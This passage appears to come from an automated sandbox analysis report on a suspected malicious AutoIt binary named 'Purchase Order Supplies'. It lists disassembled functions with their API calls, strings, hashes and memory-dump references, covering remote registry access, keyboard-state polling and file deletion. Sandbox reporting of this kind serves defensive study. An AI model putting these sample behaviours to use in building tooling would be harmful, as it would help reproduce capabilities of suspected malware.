                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 9978da1fd063fd28c33cab5bda2fece7463f71f2d72ededf06921f0b412dddbd
                          • Instruction ID: e1ac2d1ace55b4953f89d565fed00e831ac2abbe4093af1d801ee1f7267b1208
                          • Opcode Fuzzy Hash: 9978da1fd063fd28c33cab5bda2fece7463f71f2d72ededf06921f0b412dddbd
                          • Instruction Fuzzy Hash: F6514975900349AFCB14CFA9CC84EAEBBB9EF48310F14841DF95AA7310C731A9418B60
                          Function 00CDD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00CDD567
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CDD589
                          • __swprintf.LIBCMT ref: 00CDD5DC
                          • _wprintf.LIBCMT ref: 00CDD68D
                          • _wprintf.LIBCMT ref: 00CDD6AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-2391861430
                          • Opcode ID: 897b8b671e4163b5cb439548bb682b9bcbd9d1a22bcbd9f01c09bb4c748a17ff
                          • Instruction ID: b6255ca899f30fc56cecd0c77e5d31feaf1267fb2b6b324e600daaf82f1ed88f
                          • Opcode Fuzzy Hash: 897b8b671e4163b5cb439548bb682b9bcbd9d1a22bcbd9f01c09bb4c748a17ff
                          • Instruction Fuzzy Hash: DA51B471800209BBCF15EBA4DD46EEEB779AF14300F104566F606B21A1EF719F58EBA0
                          Function 00CDD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CDD37F
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CDD3A0
                          • __swprintf.LIBCMT ref: 00CDD3F3
                          • _wprintf.LIBCMT ref: 00CDD499
                          • _wprintf.LIBCMT ref: 00CDD4B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-3420473620
                          • Opcode ID: b3e99cccad86f97321b4d8f86b59dbcf998a98bc98c1f7dade56a8724c2fb0cf
                          • Instruction ID: 70632120c54730e6ee37f9f55db9dd0ee8d160aa4cf9c6a9151418c2c36904c2
                          • Opcode Fuzzy Hash: b3e99cccad86f97321b4d8f86b59dbcf998a98bc98c1f7dade56a8724c2fb0cf
                          • Instruction Fuzzy Hash: 0051C372800209BBCF15EBA4DD46EEEB779AF14700F104166F206B21A1EB756F58EB61
                          Function 00CCAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • _memset.LIBCMT ref: 00CCAF74
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CCAFA9
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CCAFC5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CCAFE1
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CCB00B
                          • CLSIDFromString.COMBASE(?,?), ref: 00CCB033
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCB03E
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CCB043
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 1411258926-22481851
                          • Opcode ID: 4d03df6bd9be36ea314505b0a241ef8ede4c5f80c7e893617b7917b163d02b19
                          • Instruction ID: 5b1b9506d20104efafa5e7491d6b96b2c2d600bc57dbaa847798cb4ca1b7dbf1
                          • Opcode Fuzzy Hash: 4d03df6bd9be36ea314505b0a241ef8ede4c5f80c7e893617b7917b163d02b19
                          • Instruction Fuzzy Hash: 44410876C1022DABCF11EBA4DC89DEEB779BF18704F404169F911A21A0EB709E05DF60
                          Function 00CF3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 3964851224-909552448
                          • Opcode ID: 63c0aebc7b5711d74f588a50a197418826eb66eafa6ab5134b8c008aba4497d6
                          • Instruction ID: 4f77ce1cafcc0530232dc96d056ceaaef4f4dd3060b0010dcef118f1eb081077
                          • Opcode Fuzzy Hash: 63c0aebc7b5711d74f588a50a197418826eb66eafa6ab5134b8c008aba4497d6
                          • Instruction Fuzzy Hash: 0941AB3410028EABCF44EF44D841BFA3361BF17394F154928EDA16B295DB349E4ADBB2
                          Function 00CD83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD843F
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD8455
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD8466
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD8478
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD8489
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2279737902-1007645807
                          • Opcode ID: 2f45239146f5da8740b28c1541a9a51446856e6b94fc128623522a6e468a9ba9
                          • Instruction ID: ed98d3a2db3d3026405a6bb7dc7b69a1fe3a64c4eddb6f462756c1492c3d73b3
                          • Opcode Fuzzy Hash: 2f45239146f5da8740b28c1541a9a51446856e6b94fc128623522a6e468a9ba9
                          • Instruction Fuzzy Hash: 0A11A761A502AD7EDB20A7A5DC5ADFFBB7CEB91B00F44042AB511A21D1DEA05E4CC5B0
                          Function 00CD8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00CD809C
                            • Part of subcall function 00CAE3A5: timeGetTime.WINMM(?,7697B400,00D06163), ref: 00CAE3A9
                          • Sleep.KERNEL32(0000000A), ref: 00CD80C8
                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00CD80EC
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CD810E
                          • SetActiveWindow.USER32 ref: 00CD812D
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD813B
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD815A
                          • Sleep.KERNEL32(000000FA), ref: 00CD8165
                          • IsWindow.USER32 ref: 00CD8171
                          • EndDialog.USER32(00000000), ref: 00CD8182
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: e1e2b50bb142d905d432a8f610c3752060ad8f253f79d17eceef71bef6968298
                          • Instruction ID: 3b2551b8547df8bd93b1baa3874047ac561c7adc128c170dc189ec9c2419cf44
                          • Opcode Fuzzy Hash: e1e2b50bb142d905d432a8f610c3752060ad8f253f79d17eceef71bef6968298
                          • Instruction Fuzzy Hash: 17218E70240305BFE7225B62EC89A7A7B6BF7153CAB444116FA11C23A1CF725E0EA731
                          Function 00CD32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D03C64,00000010,00000000,Bad directive syntax error,00D2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00CD32D1
                          • LoadStringW.USER32(00000000,?,00D03C64,00000010), ref: 00CD32D8
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • _wprintf.LIBCMT ref: 00CD3309
                          • __swprintf.LIBCMT ref: 00CD332B
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CD3395
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1506413516-4153970271
                          • Opcode ID: 3edec60969c5084e47f8d552e6aae474b78159304bdb70a14f75706d31623bf2
                          • Instruction ID: ba3d26cf17e037bb5cf4cff52569ff42ef0358834db06aca8a411d17d93869d7
                          • Opcode Fuzzy Hash: 3edec60969c5084e47f8d552e6aae474b78159304bdb70a14f75706d31623bf2
                          • Instruction Fuzzy Hash: 72213B31840259BBDF12AF90CC4AEEE7779BF28700F004456F515A10A1EB75AA58EB61
                          Function 00CDC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CDC6A0: __time64.LIBCMT ref: 00CDC6AA
                            • Part of subcall function 00C941A7: _fseek.LIBCMT ref: 00C941BF
                          • __wsplitpath.LIBCMT ref: 00CDC96F
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcscpy.LIBCMT ref: 00CDC982
                          • _wcscat.LIBCMT ref: 00CDC995
                          • __wsplitpath.LIBCMT ref: 00CDC9BA
                          • _wcscat.LIBCMT ref: 00CDC9D0
                          • _wcscat.LIBCMT ref: 00CDC9E3
                            • Part of subcall function 00CDC6E4: _memmove.LIBCMT ref: 00CDC71D
                            • Part of subcall function 00CDC6E4: _memmove.LIBCMT ref: 00CDC72C
                          • _wcscmp.LIBCMT ref: 00CDC92A
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF49
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF5C
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDCB8D
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDCC24
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDCC3A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDCC4B
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDCC5D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 152968663-0
                          • Opcode ID: 85a629b5e04ae786607e0e36a796208aa087ce1780be1ac849e519ea8ceec392
                          • Instruction ID: 99a998cd9908eabfb62a6de070f8cfa2c157a2694fddb7382d9284cb972d4626
                          • Opcode Fuzzy Hash: 85a629b5e04ae786607e0e36a796208aa087ce1780be1ac849e519ea8ceec392
                          • Instruction Fuzzy Hash: 61C12BB1D00229AECF14DF95CC81EDEBBBDAF59310F0040AAF609E6251DB709A85DF65
                          Function 00CE08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                          • String ID:
                          • API String ID: 3566271842-0
                          • Opcode ID: d3be6798917c3a6f387e3faf73bb2decb86f959495c0cc50fc3fe5d94ebf38b8
                          • Instruction ID: 167ccf2a2c9578b9f649b3280b3f1743b17434555b9454b9bc776aa9efe0203f
                          • Opcode Fuzzy Hash: d3be6798917c3a6f387e3faf73bb2decb86f959495c0cc50fc3fe5d94ebf38b8
                          • Instruction Fuzzy Hash: EC713D75A00219AFDB10DFA5C888ADEB7B9EF48310F148095E919EB251DB74EE41DF90
                          Function 00CD388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00CD3908
                          • SetKeyboardState.USER32(?), ref: 00CD3973
                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD3993
                          • GetKeyState.USER32(000000A0), ref: 00CD39AA
                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD39D9
                          • GetKeyState.USER32(000000A1), ref: 00CD39EA
                          • GetAsyncKeyState.USER32(00000011), ref: 00CD3A16
                          • GetKeyState.USER32(00000011), ref: 00CD3A24
                          • GetAsyncKeyState.USER32(00000012), ref: 00CD3A4D
                          • GetKeyState.USER32(00000012), ref: 00CD3A5B
                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD3A84
                          • GetKeyState.USER32(0000005B), ref: 00CD3A92
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 333edd8cab11202d018ce34825fe97a708ab51d5b527648fc1f0bac17387e94a
                          • Instruction ID: 9904efdffd3a9b88f60eedcad46c87b67119cea272cc9dd59cc0607f1ab3d982
                          • Opcode Fuzzy Hash: 333edd8cab11202d018ce34825fe97a708ab51d5b527648fc1f0bac17387e94a
                          • Instruction Fuzzy Hash: A1518420A047C469FB35EBA488117AABBB45F01340F08859FD7D65A3C2DB649B8CD767
                          Function 00CCFAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00CCFB19
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFB2B
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCFB89
                          • GetDlgItem.USER32(?,00000002), ref: 00CCFB94
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFBA6
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCFBFC
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCFC0A
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFC1B
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCFC5E
                          • GetDlgItem.USER32(?,000003EA), ref: 00CCFC6C
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCFC89
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCFC96
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 2632b348b7fea85a6483cbe90bf9c53321bb488bbd919db8e88cd9af7d9c0375
                          • Instruction ID: 23a800348e1e66f3f6561081213eaf7a911b264e05981365ad221096c3afd921
                          • Opcode Fuzzy Hash: 2632b348b7fea85a6483cbe90bf9c53321bb488bbd919db8e88cd9af7d9c0375
                          • Instruction Fuzzy Hash: 5551FE71B00209BFDB18CF69DD95FAEBBBAEB88710F14812DF915D6290DB709E018B10
                          Function 00CAB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • GetSysColor.USER32(0000000F), ref: 00CAB067
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 18c1c51edddf25e2aa0c8f228f057f05ff6fb5ed579f366de81fa84583295449
                          • Instruction ID: bd8ac3567dc589ffc2a1f1773d6c2b0eb7ff907e5984c176f929e96d8a77b249
                          • Opcode Fuzzy Hash: 18c1c51edddf25e2aa0c8f228f057f05ff6fb5ed579f366de81fa84583295449
                          • Instruction Fuzzy Hash: 1941A371100611BFDB205F38D848BBA3B66AB07725F184265FE758E2E6D7318D42DB31
                          Function 00CD7334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 8d73edbc77d14679d1d88fca0cbd14743c16a15ee55b8fa696e1b32f754b9a79
                          • Instruction ID: a7df740ed8c9674faeca3d0d7bd27b643b82e712d6bd7401dcacddfb854b5d72
                          • Opcode Fuzzy Hash: 8d73edbc77d14679d1d88fca0cbd14743c16a15ee55b8fa696e1b32f754b9a79
                          • Instruction Fuzzy Hash: 36411FB280416CAADB21EB50DC51EDE73BCAB08310F5441E7FA19A3151EB31ABD4DFA0
                          Function 00C984A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
